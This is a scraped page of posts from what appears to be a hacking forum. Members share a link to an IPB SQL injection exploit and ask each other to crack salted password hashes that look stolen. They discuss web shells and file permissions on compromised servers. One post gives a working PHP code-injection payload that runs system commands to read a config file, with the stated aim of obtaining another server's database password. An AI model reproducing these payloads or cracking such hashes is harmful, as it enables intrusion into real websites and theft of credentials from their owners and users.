 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 155
 Members: 0
 Total: 155
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
|
The exploit is released here:
http://de.crypt.in/threads/50-IPB-3.0.1-SQL-Injection-Exploit
There is also a slightly improved 2.3.5 exploit. |
|
|
|
|
Hey guys, can any of you crack this?
Hash: 8426975e370aab3bf9de8b2b8a637b04
Salt: &c.rl |
|
|
|
|
| You're not allowed to post websites... |
|
|
|
|
If you do this every lamer with brains will find your password for 5 min.Why?Very simple.access_log,stats ....etc and worse he find your shell.
They will find your shell anyway. The best thing to ... |
|
|
|
|
What PHP code are you executing?
I know this is a bit of spoonfeeding, but I don't think there's any other way to show you:
So the first thing you do is figure out if running system commands is ... |
|
|
|
|
Even though waraxe put some time into replying, he didn't touch every topic out there. This is why you should read up.
For example:
1) Whether you can write files depends on the permissions of the ... |
|
|
|
|
Calm down, folkses, you'll learn at your own pace.
I see nuker as someone who's trying to learn and is not just a skiddie.
As for help, PM me anytime. I don't usually read those, but now I will. |
|
|
|
|
No. You can read all files readable by the web server (source code), and you can upload files to directories chmodded to 777.
If upload is possible, you can also upload software and run it, which m ... |
|
|
|
|
This will work, but you need to scroll down to $i = 370 and manually change the 370 to whatever location you think the mask starts at.
I am working on automating that at the moment, till then, you ... |
|
|
|
|
Wow...I didn't even know it stored passwords like that.
I'll get on that for you and come up with a solution. |
|
|
|
|
c59d9a472c918bcbe8ed9d2dac288aa7:%Mt!Y
4435cdae4854b8554fd3d0e66025906a:O>#.[
0ae211b3fe51aaf22a1e555fce70abd9:Q>?{=
903359f388ab42a6b2f7ea6973e58f4b:10&cL
My dictionaries failed me ag ... |
|
|
|
|
Highest priority:
44f5e6aee89d4e9350c95ae4e6f88e41:<'6iI
Low priority:
6f2a78fbe6deaeda0315e26804ccc1b8:aVMM
4d57b2e28b051cf82daf4975ac21ebdb:wPqY]
5d701fb201304ed46b1003b815129013:zKn|A |
|
|
|
|
Here's what finally worked:
${${print $query='cat /home/***/***/config/servers.php'}}
${${system($query,$out)}}
${${print $out}}
And I spent so much time figuring it out...lolz. |
|
|
|
|
| Because the servers.php file is accessing a different database on a different server whose password I want... |
|
|
| Page 1 of 2 |
Goto page 1, 2Next
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
